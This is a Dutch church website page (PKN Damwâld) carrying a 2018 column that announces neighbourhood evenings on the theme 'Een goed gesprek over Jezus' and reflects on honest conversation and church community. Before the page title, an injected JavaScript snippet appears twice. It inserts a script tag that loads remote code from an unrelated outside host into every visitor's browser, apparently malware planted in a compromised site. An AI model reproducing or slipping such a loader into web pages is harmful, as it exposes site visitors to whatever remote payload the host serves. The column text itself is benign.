;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Een goed gesprek over Jezus - PKN Damwâld

Een goed gesprek over Jezus

Gepubliceerd op: vrijdag 12 oktober 2018

Onder het motto “EEN GOED GESPREK OVER JEZUS” vinden op  16 oktober en 13 november weer de jaarlijkse wijkavonden van Hervormd Akkerwoude plaats. Qua thema heeft de commissie zich wederom laten inspireren door het materiaal dat onze PKN heeft samengesteld. Het beloven verrassende avonden te worden met veel gezelligheid en verdieping!

Tijdens een wandeling en aan de maaltijd praten mensen makkelijker met elkaar. Bij uitstek een gelegenheid om te praten over wat je bezighoudt. Geloven is geen theoretische aangelegenheid, het raakt en verandert het leven elke dag. Hoe wordt dat bij jou zichtbaar in het dagelijks leven? Hoe geeft jij dat handen en voeten? En wat merken de mensen in jouw omgeving daarvan? Ontmoet elkaar en geef elkaar een kijkje in uw leven.

We  zijn met elkaar beland  in  een wereld van oneliners, van snel scoren. We roepen en roepen om het hardst terug, lijkt het credo. Vooral om gehoord te worden door wie dan ook en daarmee door het grote publiek. In een maatschappij waarin we – mede onder invloed van social media  – zijn we vaak geneigd om vooral de mooie kant van ons leven te tonen, blijken écht goede gesprekken soms zeldzaam, vaak omdat we bang zijn voor het oordeel van anderen. Jammer, want zoals ik laatst ergens las: ‘Wanneer je je kwetsbaar opstelt in je gesprekken met anderen, zul je veel wijzer worden en meer groeien dan wanneer je steeds aan de oppervlakte blijft.’

In de kerk voeren we gesprekken over van alles en nog wat. Wanneer zeggen we dat het een goed gesprek was? Dan gaat het in ieder geval om een echte ontmoeting, met tijd en aandacht … met God! Dan gaat het ook over wat ons bezighoudt, bezielt. Wat we daaraan beleven en wat we daarvan door willen geven aan onze kinderen, aan onze vrienden en buren wellicht. ‘Een goed gesprek’ … communicatie is de smeerolie. In de kerk is er voortdurend contact: van een hand vasthouden tot een gesprek!

Als gelovigen beseffen we namelijk dat er meer is in het leven. Dat blijkt bijvoorbeeld bij momenten van geluk, maar ook als het schuurt in ons dagelijks leven of in de samenleving. Het geloof is niet alleen iets voor zon- en feestdagen, maar voor alle dagen van het leven. Het leven kan mooi zijn. Iets om te delen. Het kan ook zwaar zijn. Iets waarvoor je steun nodig hebt. De kerk, en dan vooral de plaatselijke kerkelijke gemeente, probeert een plek te zijn waar mensen lief en leed met elkaar delen. Omzien naar elkaar. Dat kan in verschillende vormen. Van laagdrempelig tot intensief. Zo is er vaak na een kerkdienst gelegenheid om met elkaar een kopje koffie of thee te drinken. Door de week zijn er allerlei groepen (gespreksgroepen, vergaderingen, jeugdactiviteiten).  Uiteraard ben je ook meer dan welkom bij één van onze wijkavonden. En bij problemen kan je terecht bij de dominee voor een goed gesprek en advies. Tegen alle individualisering van de samenleving in, houdt de kerk de droom gaande, dat mensen goed kunnen zijn voor elkaar.

Waar kun je doorvragen als je denkt dat er meer is dan wonen, werken, winkelen, uitgaan? Waar vind je hoop naast happinez? Hoe vind je tijd voor rust en bezinning in je agenda? Is er een gemeenschap waar je welkom bent zoals je bent, met of zonder succesverhaal? Onze (kerk-) deuren voor je open. Zoekers, twijfelaars en critici: welkom. We staan open voor gesprek !

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns